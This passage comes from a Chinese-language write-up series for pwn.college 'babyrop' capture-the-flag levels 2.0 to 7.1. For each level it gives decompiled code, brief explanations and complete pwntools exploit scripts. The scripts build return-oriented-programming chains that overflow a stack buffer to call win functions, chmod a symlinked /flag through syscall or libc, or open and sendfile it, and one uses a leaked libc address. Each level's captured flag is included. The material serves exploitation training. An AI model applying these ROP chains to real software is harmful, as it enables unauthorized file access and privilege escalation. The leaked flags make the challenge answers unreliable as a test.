    "In this challenge, there are 2 stages of win functions. The functions are labeled `win_stage_1` through `win_stage_2`.");
  puts("In order to get the flag, you will need to call all of these stages in order.\n");
  puts("You can call a function by directly overflowing into the saved return address,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_QWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_QWORD)buf + 8,
    79);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 79);
  puts("and 8 that will overwrite the return address).");
  v7 = read(0, buf, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1);
  return puts("Leaving!");
}

~真是经经又典典的开场啊，反汇编贴出来都是增加碳排放。~

逆向发现有两个 win 函数：

int win_stage_1()
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v2; // [rsp+114h] [rbp-Ch]
  int v3; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  fd = open("/flag", 0);
  v3 = lseek(fd, 0LL, 2) / 2 + 1;
  lseek(fd, 0LL, 0);
  v2 = read(fd, buf, v3);
  write(1, buf, v2);
  return close(fd);
}

int win_stage_2()
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v2; // [rsp+114h] [rbp-Ch]
  int v3; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  fd = open("/flag", 0);
  v3 = lseek(fd, 0LL, 2) / 2 + 1;
  lseek(fd, v3, 0);
  v2 = read(fd, buf, v3);
  write(1, buf, v2);
  return close(fd);
}

lseek 函数用于修改文件指针位置，它的定义如下：

// attributes: thunk
__off_t lseek(int fd, __off_t offset, int whence)
{
  return lseek(fd, offset, whence);
}

fd 是文件描述符、offset 是 whence 的偏移量、whence 决定了偏移的基准位置。执行成功返回新的文件偏移量，以字节为单位；失败则返回 -1，并设置 errno 表示错误原因。whence 有三个可选参数：SEEK_SET (0)、SEEK_CUR (1) 和 SEEK_END (2)，分别表示文件头、当前位置和文件末。

就以 win_stage_1 为例简单讲一下 lseek 在这里的作用：首先 open 返回了打开的文件描述符，v3 = lseek(fd, 0LL, 2) / 2 + 1; 做的是将 fd 的文件指针定位到文件末，返回了整个文件的大小，除以 2 相当于取这个文件的一半数据，然后加一，返回值保存到 v3。之后 lseek(fd, 0LL, 0); 又将文件指针指回文件头，v2 = read(fd, buf, v3); 做的是从 fd 读取 v3 字节数据到 buf，之后 write(1, buf, v2); 将 buf 中 v2 字节数据写入 stdout，所以整个函数就是做了一个读取文件一半加一字节内容并输出的工作。注意 win_stage_1 是读取前一半并输出，而 win_stage_2 是读取后一半并输出。

所以我们要做的很简单，就是构造 ROP Chain 依次执行这两个函数呗。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level2.0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x68, b"A")
win_stage_1 = p64(0x401D66)
win_stage_2 = p64(0x401E13)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_ret
    payload += win_stage_1
    payload += win_stage_2

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)
        target.recvall(timeout=3)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{4v7M0arrSE56nVZynPmA1hGzVcg.01M0MDL5cTNxgzW}

Level 2.1

Information

Category: Pwn

Description

Use ROP to trigger a two-stage win function!

Write-up

参见 Level 2.0。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level2.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x28, b"A")
win_stage_1 = p64(0x401F0F)
win_stage_2 = p64(0x401FBC)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_ret
    payload += win_stage_1
    payload += win_stage_2

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)
        target.recvall(timeout=3)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8i7RS4fxOytxYOpVidcCJE-hXqd.0FN0MDL5cTNxgzW}

Level 3.0

Information

Category: Pwn

Description

Use ROP to trigger a multi-stage win function!

Write-up

为了保护环境，某些增加碳排放的东西我就不贴了，直接贴核心。

int __fastcall win_stage_1(int a1)
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v3; // [rsp+114h] [rbp-Ch]
  int v4; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  if ( a1 != 1 )
    return puts("Error: Incorrect value!");
  fd = open("/flag", 0);
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
  lseek(fd, 0LL, 0);
  v3 = read(fd, buf, v4);
  write(1, buf, v3);
  return close(fd);
}

int __fastcall win_stage_2(int a1)
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v3; // [rsp+114h] [rbp-Ch]
  int v4; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  if ( a1 != 2 )
    return puts("Error: Incorrect value!");
  fd = open("/flag", 0);
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
  lseek(fd, v4, 0);
  v3 = read(fd, buf, v4);
  write(1, buf, v3);
  return close(fd);
}

int __fastcall win_stage_3(int a1)
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v3; // [rsp+114h] [rbp-Ch]
  int v4; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  if ( a1 != 3 )
    return puts("Error: Incorrect value!");
  fd = open("/flag", 0);
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
  lseek(fd, 2 * v4, 0);
  v3 = read(fd, buf, v4);
  write(1, buf, v3);
  return close(fd);
}

int __fastcall win_stage_4(int a1)
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v3; // [rsp+114h] [rbp-Ch]
  int v4; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  if ( a1 != 4 )
    return puts("Error: Incorrect value!");
  fd = open("/flag", 0);
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
  lseek(fd, 3 * v4, 0);
  v3 = read(fd, buf, v4);
  write(1, buf, v3);
  return close(fd);
}

int __fastcall win_stage_5(int a1)
{
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
  int v3; // [rsp+114h] [rbp-Ch]
  int v4; // [rsp+118h] [rbp-8h]
  int fd; // [rsp+11Ch] [rbp-4h]

  if ( a1 != 5 )
    return puts("Error: Incorrect value!");
  fd = open("/flag", 0);
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
  lseek(fd, 4 * v4, 0);
  v3 = read(fd, buf, v4);
  write(1, buf, v3);
  return close(fd);
}

这次分成了五个阶段输出，只要分别绕过这五个阶段的 if 即可。因为是 amd64 架构的，所以第一个参数通过 rdi 传递，我们直接找有关这个寄存器的 gadgets，发现：0x402b53: pop rdi ; ret，很好，这样的话我们先返回到这个 gadget，然后在它后面放绕过判断的参数，这个参数就会被 pop 到 rdi，之后再接函数地址就好了。

感觉这题也可以用 D(ata)OP，~但是我一定不会告诉你我曾闲的蛋疼放着捷径不走试图绕远路，最后发现这条路是真 tm 远所以掉头回来走捷径的……~

Exploit

#!/usr/bin/python3

from pwn import ELF, ROP, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level3.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+337
b *challenge+488
c
"""

padding_to_ret = b"".ljust(0x68, b"A")

win_stage_1 = p64(0x4023D9)
bypass_win_stage_1 = p64(0x1)
win_stage_2 = p64(0x402760)
bypass_win_stage_2 = p64(0x2)
win_stage_3 = p64(0x402598)
bypass_win_stage_3 = p64(0x3)
win_stage_4 = p64(0x40267A)
bypass_win_stage_4 = p64(0x4)
win_stage_5 = p64(0x4024B5)
bypass_win_stage_5 = p64(0x5)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address

    payload = padding_to_ret

    for i in range(1, 6):
        payload += p64(pop_rdi_ret)
        payload += globals()[f"bypass_win_stage_{i}"]
        payload += globals()[f"win_stage_{i}"]

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{EE8eEBP70ZX0reoW2Pp8YObscck.0VN0MDL5cTNxgzW}

Level 3.1

Information

Category: Pwn

Description

Use ROP to trigger a multi-stage win function!

Write-up

参见 Level 3.0。

Exploit

#!/usr/bin/python3

from pwn import ELF, ROP, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level3.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x58, b"A")

win_stage_1 = p64(0x4015E3)
bypass_win_stage_1 = p64(0x1)
win_stage_2 = p64(0x40133A)
bypass_win_stage_2 = p64(0x2)
win_stage_3 = p64(0x4016BF)
bypass_win_stage_3 = p64(0x3)
win_stage_4 = p64(0x40141A)
bypass_win_stage_4 = p64(0x4)
win_stage_5 = p64(0x401500)
bypass_win_stage_5 = p64(0x5)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address

    payload = padding_to_ret

    for i in range(1, 6):
        payload += p64(pop_rdi_ret)
        payload += globals()[f"bypass_win_stage_{i}"]
        payload += globals()[f"win_stage_{i}"]

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{o7dF6gbwKmwO-Xrdr1WGG5iKIQ-.0lN0MDL5cTNxgzW}

Level 4.0

Information

Category: Pwn

Description

Leverage a stack leak while crafting a ROP chain to obtain the flag!

Write-up

这题就是自由 ROP 自由日了，感觉还是用 chmod 最简单，问题在于如何传递第一个参数 const char *filename。

嗯……自己构造 /flag 或者别的字符串未免也太麻烦了点，我们直接让 IDA 老婆看看程序本身有没有什么现成的好东西是我们可以直接利用的：

像这个 ret 看上去就很~清秀~了，我很喜欢～

说实话我感觉自己可能跑偏了，据说这题可以自己构造字符串，但是我太笨了没想出来怎么 leak stack……但是，你就说我这个方法是不是更简单吧 LMAO

刚打完 Level 7 的我敏锐的注意到了什么……既然 Level 7 是直接输出地址，那么……靠，Level 4 果然是把栈地址直接告诉我们了，但因为我没关注程序输出，so……好吧我本以为有什么神奇的构造字符串方法，那没事了，又结了一桩心头大患……

我日，为什么今天都 1.20 了，寒假过的真快，结束前能不能打完 FmtStr 都不好说了……

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level4.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+396
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x48, b"A")

    filename = next(elf.search(b"ret"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rax_ret = rop.rax.address
    syscall = rop.syscall.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        pop_rax_ret,
        constants.SYS_chmod,
        syscall,
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag ret")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{EXzWCvmQZIa9w6wrK_nx0PK1w3_.01N0MDL5cTNxgzW}

Level 4.1

Information

Category: Pwn

Description

Leverage a stack leak while crafting a ROP chain to obtain the flag!

Write-up

参见 Level 4.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level4.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x78, b"A")

    filename = next(elf.search(b"###"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rax_ret = rop.rax.address
    syscall = rop.syscall.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        pop_rax_ret,
        constants.SYS_chmod,
        syscall,
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag '###'")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{g2fR-zCK75_60foo4wveIENcvF0.0FO0MDL5cTNxgzW}

Level 5.0

Information

Category: Pwn

Description

Craft a ROP chain to obtain the flag, now with no stack leak!

Write-up

这题才应该用我在 Level 4 用的方法吧，有时间我得好好研究下 Level 4 到底怎么泄漏地址了……

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level5.0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x48, b"A")

    filename = next(elf.search(b"GNU"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rax_ret = rop.rax.address
    syscall = rop.syscall.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        pop_rax_ret,
        constants.SYS_chmod,
        syscall,
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{sAqwz2eKPKj_t1zS9diA-_sbUf0.0VO0MDL5cTNxgzW}

Level 5.1

Information

Category: Pwn

Description

Craft a ROP chain to obtain the flag, now with no stack leak!

Write-up

参见 Level 5.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level5.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x68, b"A")

    filename = next(elf.search(b"GNU"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rax_ret = rop.rax.address
    syscall = rop.syscall.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        pop_rax_ret,
        constants.SYS_chmod,
        syscall,
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Uer5U7c794jENBtWtFCgDEyLRsm.0FM1MDL5cTNxgzW}

Level 6.0

Information

Category: Pwn

Description

Craft a ROP chain to obtain the flag, now with no syscall gadget!

Write-up

没有 syscall gadget 了，但是瞧瞧我发现了什么？

ssize_t __fastcall force_import(const char *a1, int a2)
{
  off_t *v2; // rdx
  size_t v3; // rcx

  open(a1, a2);
  return sendfile((int)a1, a2, v2, v3);
}

一次传参直接调用 force_import 肯定是不太方便的，但是既然内部有 open 和 sendfile，那为何不分别调用它们呢？easy peasy!

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level6.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+288
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x58, b"A")

    # args for open
    filename = next(elf.search(b"GNU"))
    flags = constants.O_RDONLY

    # args for sendfile
    out_fd = 0x1
    in_fd = 0x3
    offset = 0x0
    count = 0x1000

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rdx_ret = rop.rdx.address
    pop_rcx_ret = rop.rcx.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        flags,
        elf.symbols["open"],
        pop_rdi_ret,
        out_fd,
        pop_rsi_ret,
        in_fd,
        pop_rdx_ret,
        offset,
        pop_rcx_ret,
        count,
        elf.symbols["sendfile"],
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{0u8eS8EM1OTTXbPHdwgRj2FQ4m0.0VM1MDL5cTNxgzW}

Level 6.1

Information

Category: Pwn

Description

Craft a ROP chain to obtain the flag, now with no syscall gadget!

Write-up

参见 Level 6.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    constants,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level6.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    rop = ROP(elf)

    padding_to_ret = b"".ljust(0x28, b"A")

    # args for open
    filename = next(elf.search(b"GNU"))
    flags = constants.O_RDONLY

    # args for sendfile
    out_fd = 0x1
    in_fd = 0x3
    offset = 0x0
    count = 0x1000

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address
    pop_rdx_ret = rop.rdx.address
    pop_rcx_ret = rop.rcx.address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        flags,
        elf.symbols["open"],
        pop_rdi_ret,
        out_fd,
        pop_rsi_ret,
        in_fd,
        pop_rdx_ret,
        offset,
        pop_rcx_ret,
        count,
        elf.symbols["sendfile"],
    )

    return payload


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{A-DtWrNucuvlqiQOl-yB1ARFcxt.0lM1MDL5cTNxgzW}

Level 7.0

Information

Category: Pwn

Description

Utilize a libc leak to ROP with libc!

Write-up

利用已经泄漏的 system 的地址减去 system 在 libc 中的偏移得到 libc 的基地址，然后通过 libc 基地址加上 chmod 在 libc 中的偏移就可以得到 chmod 的实际地址了。简简单单，都不需要想办法怎么泄漏地址，程序直接通过 dlsym((void *)0xFFFFFFFFFFFFFFFFLL, "system"); 把地址告诉我们了……

另外，为了防止有人不知道怎么获取当前程序使用的 libc，这里简单贴一下：

hacker@return-oriented-programming~level7-0:~$ ldd /challenge/babyrop_level7.0
        linux-vdso.so.1 (0x00007ffd75fe8000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x0000745ac0578000)
        /lib64/ld-linux-x86-64.so.2 (0x0000745ac077b000)

嗯……如果你不知道我讲的是什么，建议去补习一下 PLT 延迟绑定。推荐看**《程序员的自我修养——链接、装载与库》，CSAPP** 也可以看看，反正底层知识有空一定要多学学，非常重要。

哎不对，难道说 Level 4……

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level7.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+380
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    padding_to_ret = b"".ljust(0x58, b"A")

    libc.address = leaked_addr - libc.symbols["system"]

    filename = next(elf.search(b"GNU"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_pop_r15_ret,
        mode,
        b"".ljust(0x8, b"A"),
        libc.symbols["chmod"],
    )

    return payload


def leak(target):
    target.recvuntil(b'"system" in libc is: ')

    return int(target.recv(14), 16)


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(leak(target))

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{USImSejN9YmHN5CcyKDwtVScMO7.01M1MDL5cTNxgzW}

Level 7.1

Information

Category: Pwn

Description

Utilize a libc leak to ROP with libc!

Write-up

参见 Level 7.0。

Exploit

